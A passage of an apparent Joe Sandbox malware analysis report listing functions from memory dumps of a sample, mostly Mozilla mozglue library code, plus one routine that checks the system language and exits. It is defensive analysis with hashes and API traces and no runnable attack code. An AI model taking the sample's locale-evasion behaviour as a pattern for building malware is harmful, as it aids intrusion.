UnmapViewOfFile.KERNEL32 ref: 6C6BAD1C
CloseHandle.KERNEL32 ref: 6C6BAD28
UnmapViewOfFile.KERNEL32 ref: 6C6BAD37
CloseHandle.KERNEL32 ref: 6C6BAD43
CloseHandle.KERNEL32 ref: 6C6BAD67

Memory Dump Source

Source File: 00000000.00000002.2282469723.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2282453412.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2282518597.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2282539890.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2282555646.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: File$View$CloseHandle$CreateInfoSystemUnmap$Mapping
String ID:
API String ID: 1192971331-0
Opcode ID: 59696297686353adecd41f422a9d48b54b654ba51719b09777c39cf6cc7fa849
Instruction ID: 1d55252a4fddc2fce995aea856eb7163ac88f37b0f772768b4ec13c3e935887d
Opcode Fuzzy Hash: 59696297686353adecd41f422a9d48b54b654ba51719b09777c39cf6cc7fa849
Instruction Fuzzy Hash: A53190B1A043058FDB00AF7EC68826EBBF0FF85345F014A2DE98597215EB70A559CB86

Function 6C6A9D00 Relevance: 13.7, APIs: 9, Instructions: 178timeCOMMON

Download Yara Rule

APIs

??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,6C6A8273), ref: 6C6A9D65
free.MOZGLUE(6C6A8273,?), ref: 6C6A9D7C
free.MOZGLUE(?,?), ref: 6C6A9D92
??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?), ref: 6C6A9E0F
free.MOZGLUE(6C6A946B,?,?), ref: 6C6A9E24
free.MOZGLUE(?,?,?), ref: 6C6A9E3A
??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?), ref: 6C6A9EC8
free.MOZGLUE(6C6A946B,?,?,?), ref: 6C6A9EDF
free.MOZGLUE(?,?,?,?), ref: 6C6A9EF5

Memory Dump Source

Source File: 00000000.00000002.2282469723.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2282453412.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2282518597.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2282539890.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2282555646.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: free$StampTimeV01@@Value@mozilla@@
String ID:
API String ID: 956590011-0
Opcode ID: 67e78d3d9d097ad1ca04e265dc7055d3ed7003f3399f77049d326915d4b2b0a6
Instruction ID: fa545ec4329949322bd680fc9968324518d816ccd6c396595b76251b73b351ee
Opcode Fuzzy Hash: 67e78d3d9d097ad1ca04e265dc7055d3ed7003f3399f77049d326915d4b2b0a6
Instruction Fuzzy Hash: 2F71DF70909B418BC712CF68C48055BF3F4FF99318B508A5DE84A5BB02EB31E8C6CB99

Function 6C6ADDC0 Relevance: 13.7, APIs: 9, Instructions: 152COMMON

Download Yara Rule

APIs

?profiler_get_core_buffer@baseprofiler@mozilla@@YAAAVProfileChunkedBuffer@2@XZ.MOZGLUE ref: 6C6ADDCF

Part of subcall function 6C68FA00: ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C68FA4B

Part of subcall function 6C6A90E0: free.MOZGLUE(?,00000000,?,?,6C6ADEDB), ref: 6C6A90FF
Part of subcall function 6C6A90E0: free.MOZGLUE(?,00000000,?,?,6C6ADEDB), ref: 6C6A9108

free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C6ADE0D
free.MOZGLUE(00000000), ref: 6C6ADE41
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C6ADE5F
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C6ADEA3
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C6ADEE9
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,6C69DEFD,?,6C664A68), ref: 6C6ADF32

Part of subcall function 6C6ADAE0: ??1MutexImpl@detail@mozilla@@QAE@XZ.MOZGLUE ref: 6C6ADB86
Part of subcall function 6C6ADAE0: ??1MutexImpl@detail@mozilla@@QAE@XZ.MOZGLUE ref: 6C6ADC0E

free.API-MS-WIN-CRT-HEAP-L1-1-0(?,6C69DEFD,?,6C664A68), ref: 6C6ADF65
free.MOZGLUE(?), ref: 6C6ADF80

Part of subcall function 6C675E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6C675EDB
Part of subcall function 6C675E90: memset.VCRUNTIME140(ewkl,000000E5,?), ref: 6C675F27
Part of subcall function 6C675E90: LeaveCriticalSection.KERNEL32(?), ref: 6C675FB2

Memory Dump Source

Source File: 00000000.00000002.2282469723.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2282453412.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2282518597.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2282539890.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2282555646.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: free$CriticalImpl@detail@mozilla@@MutexSection$?profiler_get_core_buffer@baseprofiler@mozilla@@Buffer@2@ChunkedEnterExclusiveLeaveLockProfileReleasememset
String ID:
API String ID: 112305417-0
Opcode ID: f2df092d95e260577296db0a3cdb9637e2423cfc3afd14f3979aa36c4edf8aea
Instruction ID: 0ac89ea29ca3db6d5035dcbc7cb8b3ff9466a922f856cee50f87de06b4473153
Opcode Fuzzy Hash: f2df092d95e260577296db0a3cdb9637e2423cfc3afd14f3979aa36c4edf8aea
Instruction Fuzzy Hash: 4551A1726016019BD7219BA9C8806EFB3B2BF96308F95051CDD5A53B00DB31BD1BCB9E

Function 6C6B5D10 Relevance: 13.6, APIs: 9, Instructions: 126COMMON

Download Yara Rule

APIs

?_Fiopen@std@@YAPAU_iobuf@@PB_WHH@Z.MSVCP140(?,00000001,00000040,?,00000000,?,6C6B5C8C,?,6C68E829), ref: 6C6B5D32
?getloc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QBE?AVlocale@2@XZ.MSVCP140(?,00000000,00000001,?,?,?,?,00000000,?,6C6B5C8C,?,6C68E829), ref: 6C6B5D62
??0_Lockit@std@@QAE@H@Z.MSVCP140(00000000,?,?,?,?,00000000,?,6C6B5C8C,?,6C68E829), ref: 6C6B5D6D
??Bid@locale@std@@QAEIXZ.MSVCP140(?,?,?,?,00000000,?,6C6B5C8C,?,6C68E829), ref: 6C6B5D84
?_Getgloballocale@locale@std@@CAPAV_Locimp@12@XZ.MSVCP140(?,?,?,?,00000000,?,6C6B5C8C,?,6C68E829), ref: 6C6B5DA4
?_Getcat@?$codecvt@DDU_Mbstatet@@@std@@SAIPAPBVfacet@locale@2@PBV42@@Z.MSVCP140(?,?,?,?,?,?,00000000,?,6C6B5C8C,?,6C68E829), ref: 6C6B5DC9
std::_Facet_Register.LIBCPMT ref: 6C6B5DDB
??1_Lockit@std@@QAE@XZ.MSVCP140(?,?,?,?,00000000,?,6C6B5C8C,?,6C68E829), ref: 6C6B5E00
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,00000000,?,6C6B5C8C,?,6C68E829), ref: 6C6B5E45

Memory Dump Source

Source File: 00000000.00000002.2282469723.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2282453412.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2282518597.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2282539890.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2282555646.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: Lockit@std@@$??0_??1_?getloc@?$basic_streambuf@Bid@locale@std@@D@std@@@std@@Facet_Fiopen@std@@Getcat@?$codecvt@Getgloballocale@locale@std@@Locimp@12@Mbstatet@@@std@@RegisterU?$char_traits@U_iobuf@@V42@@Vfacet@locale@2@Vlocale@2@abortstd::_
String ID:
API String ID: 2325513730-0
Opcode ID: a80a0959d70ab1053441ad2f8ba8cc8c8cc49a7b861ba633720c44f9999ff0e3
Instruction ID: d43d3134bb9ef4e9c4d1c2bb39eb2cd6776b1883bcd6658d4225881a6cacb5f0
Opcode Fuzzy Hash: a80a0959d70ab1053441ad2f8ba8cc8c8cc49a7b861ba633720c44f9999ff0e3
Instruction Fuzzy Hash: 08417C307002049FDB10DFA6C8D8AAE77F6EF89314F144169E506AB791EB30A915CB69

Function 6C68CC60 Relevance: 13.6, APIs: 7, Strings: 2, Instructions: 104memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,00003000,00003000,00000004,?,?,?,6C6531A7), ref: 6C68CDDD

Strings

: (malloc) Error in VirtualFree(), xrefs: 6C68CFA4, 6C68CFB8
<jemalloc>, xrefs: 6C68CF9F, 6C68CFB3

Memory Dump Source

Source File: 00000000.00000002.2282469723.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2282453412.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2282518597.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2282539890.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2282555646.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: AllocVirtual
String ID: : (malloc) Error in VirtualFree()$<jemalloc>
API String ID: 4275171209-2186867486
Opcode ID: 9f8f935de94653ac65db46b0c6f2766408528d0946ca29d98d5c39011b3dcb21
Instruction ID: 8d2d31da99423ca1da97be1f51af25de81625c11ea9824aa909d2306d991b280
Opcode Fuzzy Hash: 9f8f935de94653ac65db46b0c6f2766408528d0946ca29d98d5c39011b3dcb21
Instruction Fuzzy Hash: 7131A7307422056BFB10AF668C45BAE7775BF85754F204118F612EB684DB70E501CBBD

Function 6C65ECD0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 143fileCOMMON

Download Yara Rule

APIs

Part of subcall function 6C65F100: LoadLibraryW.KERNEL32(shell32,?,6C6CD020), ref: 6C65F122
Part of subcall function 6C65F100: GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 6C65F132

moz_xmalloc.MOZGLUE(00000012), ref: 6C65ED50
wcslen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C65EDAC
wcslen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,\Mozilla\Firefox\SkeletonUILock-,00000020,?,00000000), ref: 6C65EDCC
CreateFileW.KERNEL32 ref: 6C65EE08
free.MOZGLUE(00000000), ref: 6C65EE27
free.MOZGLUE(?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 6C65EE32

Part of subcall function 6C65EB90: moz_xmalloc.MOZGLUE(00000104), ref: 6C65EBB5
Part of subcall function 6C65EB90: memset.VCRUNTIME140(00000000,00000000,00000104,?,?,6C68D7F3), ref: 6C65EBC3
Part of subcall function 6C65EB90: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,?,?,?,?,?,?,6C68D7F3), ref: 6C65EBD6

Strings

\Mozilla\Firefox\SkeletonUILock-, xrefs: 6C65EDC1

Memory Dump Source

Source File: 00000000.00000002.2282469723.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2282453412.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2282518597.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2282539890.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2282555646.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: Filefreemoz_xmallocwcslen$AddressCreateLibraryLoadModuleNameProcmemset
String ID: \Mozilla\Firefox\SkeletonUILock-
API String ID: 1980384892-344433685
Opcode ID: aff3e682c30c1d894395bd1230d8b7f2f94c1da813581de920205db56cd4430b
Instruction ID: 58349f6a09830bb8ba9f10bcb68811798057119605d22f8757a79b57b5dcc24a
Opcode Fuzzy Hash: aff3e682c30c1d894395bd1230d8b7f2f94c1da813581de920205db56cd4430b
Instruction Fuzzy Hash: F251F171E052048BDF00DF69C8806EEB7F0AF4A318F94852DE8956B740E7346959C7EA

Function 6C6CA520 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117COMMON

Download Yara Rule

APIs

?HandleSpecialValues@DoubleToStringConverter@double_conversion@@ABE_NNPAVStringBuilder@2@@Z.MOZGLUE ref: 6C6CA565

Part of subcall function 6C6CA470: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C6CA4BE
Part of subcall function 6C6CA470: memcpy.VCRUNTIME140(?,?,00000000), ref: 6C6CA4D6

?CreateExponentialRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHPAVStringBuilder@2@@Z.MOZGLUE ref: 6C6CA65B
?DoubleToAscii@DoubleToStringConverter@double_conversion@@SAXNW4DtoaMode@12@HPADHPA_NPAH3@Z.MOZGLUE ref: 6C6CA6B6

Strings

0, xrefs: 6C6CA5FB
z, xrefs: 6C6CA6AE

Memory Dump Source

Source File: 00000000.00000002.2282469723.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2282453412.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2282518597.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2282539890.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2282555646.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: String$Double$Converter@double_conversion@@$Builder@2@@$Ascii@CreateDtoaExponentialHandleMode@12@Representation@SpecialValues@memcpystrlen
String ID: 0$z
API String ID: 310210123-2584888582
Opcode ID: 712dce064de4174f7be760f1de679cf96d388de0a395e03b1cfbcc39e6cfbc89
Instruction ID: 04f669c28a7bbff4618a294ce90f01ccbc11bc35cfc35bd6eeabef394af0ac6b
Opcode Fuzzy Hash: 712dce064de4174f7be760f1de679cf96d388de0a395e03b1cfbcc39e6cfbc89
Instruction Fuzzy Hash: 75414771A097459FC341CF29C080A8BBBE4FF8A344F408A2EF49987651EB30D549CB87

Function 6C699420 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 45COMMON

Download Yara Rule

APIs

Part of subcall function 6C68AB89: EnterCriticalSection.KERNEL32(6C6DE370,?,?,?,6C6534DE,6C6DF6CC,?,?,?,?,?,?,?,6C653284), ref: 6C68AB94
Part of subcall function 6C68AB89: LeaveCriticalSection.KERNEL32(6C6DE370,?,6C6534DE,6C6DF6CC,?,?,?,?,?,?,?,6C653284,?,?,6C6756F6), ref: 6C68ABD1

getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C664A68), ref: 6C69945E
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C699470
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C699482
__Init_thread_footer.LIBCMT ref: 6C69949F

Strings

MOZ_BASE_PROFILER_DEBUG_LOGGING, xrefs: 6C69946B
MOZ_BASE_PROFILER_LOGGING, xrefs: 6C69947D
MOZ_BASE_PROFILER_VERBOSE_LOGGING, xrefs: 6C699459

Memory Dump Source

Source File: 00000000.00000002.2282469723.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2282453412.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2282518597.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2282539890.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2282555646.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: getenv$CriticalSection$EnterInit_thread_footerLeave
String ID: MOZ_BASE_PROFILER_DEBUG_LOGGING$MOZ_BASE_PROFILER_LOGGING$MOZ_BASE_PROFILER_VERBOSE_LOGGING
API String ID: 4042361484-1628757462
Opcode ID: 1975ebd18fdda91212e2c2a4ae65ce86654b8f1e754ebe6337f32358a6cf2a89
Instruction ID: aa2c4d1473f1cb2f1ae45731b97a48eff6bf2a21c92b5f4b9591bb7a0ffbe7d0
Opcode Fuzzy Hash: 1975ebd18fdda91212e2c2a4ae65ce86654b8f1e754ebe6337f32358a6cf2a89
Instruction Fuzzy Hash: C5012830A001028BD7109B5ED840A8D33B99F06B3DF054537DD0AC6B52D623F4648D5F

Function 00936770 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 27COMMON

Download Yara Rule

APIs

GetUserDefaultLangID.KERNEL32 ref: 00936774
ExitProcess.KERNEL32 ref: 009367A5
ExitProcess.KERNEL32 ref: 009367AF
ExitProcess.KERNEL32 ref: 009367B9
ExitProcess.KERNEL32 ref: 009367C3
ExitProcess.KERNEL32 ref: 009367CD

Strings

*, xrefs: 0093678C

Memory Dump Source

Source File: 00000000.00000002.2260490573.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true

Associated: 00000000.00000002.2260471091.0000000000920000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009A5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009A8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009DD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AC5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AE5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AEB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000B7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000CFF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000DD9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000E08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000E17000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261163423.0000000000E18000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261279659.0000000000FAF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261298260.0000000000FB0000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_920000_file.jbxd

Yara matches

Similarity

API ID: ExitProcess$DefaultLangUser
String ID: *
API String ID: 1494266314-163128923
Opcode ID: eede6f0be63c1a217cea45f7cec07c118dc5db8d035ecf3063e9f88a04aa6cd5
Instruction ID: b5270eb988d7d2190e9b057b27eb06e4852f0e4bf39c2dbc313daf78d0122d7a
Opcode Fuzzy Hash: eede6f0be63c1a217cea45f7cec07c118dc5db8d035ecf3063e9f88a04aa6cd5
Instruction Fuzzy Hash: 13F05E30908209EFDB449FE0E90973C7B70FB04703F044198E60AA72D0DAB85F419F96

Function 6C6CB540 Relevance: 12.1, APIs: 8, Instructions: 93COMMON

Download Yara Rule

APIs

?classic@locale@std@@SAABV12@XZ.MSVCP140 ref: 6C6CB5B9
??0_Lockit@std@@QAE@H@Z.MSVCP140(00000000), ref: 6C6CB5C5
??Bid@locale@std@@QAEIXZ.MSVCP140 ref: 6C6CB5DA
??1_Lockit@std@@QAE@XZ.MSVCP140(00000000), ref: 6C6CB5F4
__Init_thread_footer.LIBCMT ref: 6C6CB605
?_Getcat@?$ctype@D@std@@SAIPAPBVfacet@locale@2@PBV42@@Z.MSVCP140(00000000,?,00000000), ref: 6C6CB61F
std::_Facet_Register.LIBCPMT ref: 6C6CB631
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C6CB655

Memory Dump Source

Source File: 00000000.00000002.2282469723.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2282453412.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2282518597.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2282539890.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2282555646.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: Lockit@std@@$??0_??1_?classic@locale@std@@Bid@locale@std@@D@std@@Facet_Getcat@?$ctype@Init_thread_footerRegisterV12@V42@@Vfacet@locale@2@abortstd::_
String ID:
API String ID: 1276798925-0
Opcode ID: 3c1a17819dfe9a350094352700d341752c2ca1ac99d6397397ee31cc8f07406e
Instruction ID: 70af877dea57f0e7fc2c37128b4d8ba1b432833bcab7c8e056cdc96acfe85fe5
Opcode Fuzzy Hash: 3c1a17819dfe9a350094352700d341752c2ca1ac99d6397397ee31cc8f07406e
Instruction Fuzzy Hash: FB316F71B002058BCB00DFAAC8989AEB7F5EFCA325F150519D90697780DB31B906CF9E

Function 6C68D5D0 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 279COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(00000001,?,?,?,?,6C65EB57,?,?,?,?,?,?,?,?,?), ref: 6C68D652
memset.VCRUNTIME140(00000000,00000000,00000001,?,?,?,?,?,6C65EB57,?), ref: 6C68D660
free.MOZGLUE(?,?,?,?,?,?,?,?,?,6C65EB57,?), ref: 6C68D673
free.MOZGLUE(?), ref: 6C68D888

Strings

Wel, xrefs: 6C68D5D9, 6C68D63F
|Enabled, xrefs: 6C68D81E

Memory Dump Source

Source File: 00000000.00000002.2282469723.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2282453412.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2282518597.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2282539890.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2282555646.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: free$memsetmoz_xmalloc
String ID: Wel$|Enabled
API String ID: 4142949111-1036103015
Opcode ID: dd42113ae65c5df3a0ce37b97dceeea840c04748c57847a24978f9c8794ba008
Instruction ID: 73895f8debc637035f6ab12ae7658e5f5767ac23accadb84eb3d4b2661b4f139
Opcode Fuzzy Hash: dd42113ae65c5df3a0ce37b97dceeea840c04748c57847a24978f9c8794ba008
Instruction Fuzzy Hash: 14A1F2B0A012499FDF10CF69C4907EEBBF1AF4A318F58805ED885AB741C734A845CBB9

Function 6C6A1D00 Relevance: 10.6, APIs: 7, Instructions: 115threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6C6A1D0F
AcquireSRWLockExclusive.KERNEL32(?,?,6C6A1BE3,?,?,6C6A1D96,00000000), ref: 6C6A1D18
ReleaseSRWLockExclusive.KERNEL32(?,?,6C6A1BE3,?,?,6C6A1D96,00000000), ref: 6C6A1D4C
GetCurrentThreadId.KERNEL32 ref: 6C6A1DB7
AcquireSRWLockExclusive.KERNEL32(?), ref: 6C6A1DC0
ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C6A1DDA

Part of subcall function 6C6A1EF0: GetCurrentThreadId.KERNEL32 ref: 6C6A1F03
Part of subcall function 6C6A1EF0: AcquireSRWLockExclusive.KERNEL32(?,?,?,?,?,6C6A1DF2,00000000,00000000), ref: 6C6A1F0C
Part of subcall function 6C6A1EF0: ReleaseSRWLockExclusive.KERNEL32 ref: 6C6A1F20

moz_xmalloc.MOZGLUE(00000008,00000000,00000000), ref: 6C6A1DF4

Part of subcall function 6C66CA10: malloc.MOZGLUE(?), ref: 6C66CA26

Memory Dump Source

Source File: 00000000.00000002.2282469723.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2282453412.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2282518597.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2282539890.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2282555646.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentReleaseThread$mallocmoz_xmalloc
String ID:
API String ID: 1880959753-0
Opcode ID: 4c4b000d06f41878ff19d4314d7ed2d066b6f97361b661544fa9a5f223976c85
Instruction ID: 6237317cd5e8c4c48d03eaf6022813b837f2a5122011ce4a3e1288e701c1984f
Opcode Fuzzy Hash: 4c4b000d06f41878ff19d4314d7ed2d066b6f97361b661544fa9a5f223976c85
Instruction Fuzzy Hash: 434167B52007019FCB10DF69C488A56BBF9FF89314F10442EE95A87B41DB31F855CB99

Function 6C6984E0 Relevance: 10.6, APIs: 7, Instructions: 79COMMON

Download Yara Rule

APIs

free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C6984F3
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C69850A
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C69851E
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C69855B
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C69856F
??1UniqueJSONStrings@baseprofiler@mozilla@@QAE@XZ.MOZGLUE(?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C6985AC

Part of subcall function 6C697670: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,6C6985B1,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C69767F
Part of subcall function 6C697670: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,6C6985B1,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C697693
